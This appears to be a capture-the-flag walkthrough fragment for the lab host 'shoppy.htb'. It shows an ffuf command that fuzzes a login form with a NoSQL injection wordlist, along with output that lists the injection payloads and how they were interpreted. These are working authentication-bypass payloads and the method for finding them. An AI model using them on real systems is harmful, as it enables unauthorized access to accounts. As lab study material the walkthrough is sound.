Untitled

Untitled

Untitled

Untitled

Untitled

gobuster

dirb

The admin page redirects to the login page when the request is not authenticated.

Untitled

https://github.com/ffuf/ffuf/releases/tag/v1.5.0

# Fuzz the username field of the login form with ffuf, using the SecLists NoSQL payload list.
#   -u  target URL (the login endpoint)
#   -c  colorize the output
#   -w  wordlist; each entry is substituted for the FUZZ keyword
#   -X  HTTP method (POST)
#   -d  request body; FUZZ sits directly after "admin" in the username value
#   -H  declares the body as URL-encoded form data
# NOTE(review): wordlist entries are presumably sent as-is, without URL-encoding; entries
# containing & or = may alter the form's parameter structure instead of the username
# value, so confirm what was actually sent before interpreting a result.
./ffuf -u http://shoppy.htb/login -c -w /usr/share/seclists/Fuzzing/Databases/NoSQL.txt -X POST -d 'username=adminFUZZ&password=admin' -H 'Content-Type: application/x-www-form-urlencoded'

Untitled

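{$nin: [""]}} [Status: 302, Size: 51, Words: 4, Lines: 1, Duration: 66ms]
{ $ne: 1 } [Status: 302, Size: 51, Words: 4, Lines: 1, Duration: 84ms]
db.injection.insert({success:1}); [Status: 302, Size: 51, Words: 4, Lines: 1, Duration: 151ms]
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 [Status: 302, Size: 51, Words: 4, Lines: 1, Duration: 173ms]
{"$gt": ""} [Status: 302, Size: 51, Words: 4, Lines: 1, Duration: 175ms]
|| 1==1 [Status: 302, Size: 51, Words: 4, Lines: 1, Duration: 195ms]
' || 'a'=='a [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 254ms]

Every entry returns a 302, so the status code alone does not distinguish them. Only the last entry has a different response size (28 instead of 51). That suggests the username value reaches the database query without being handled strictly as a string, which is the behaviour the login handler needs to enforce.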

Untitled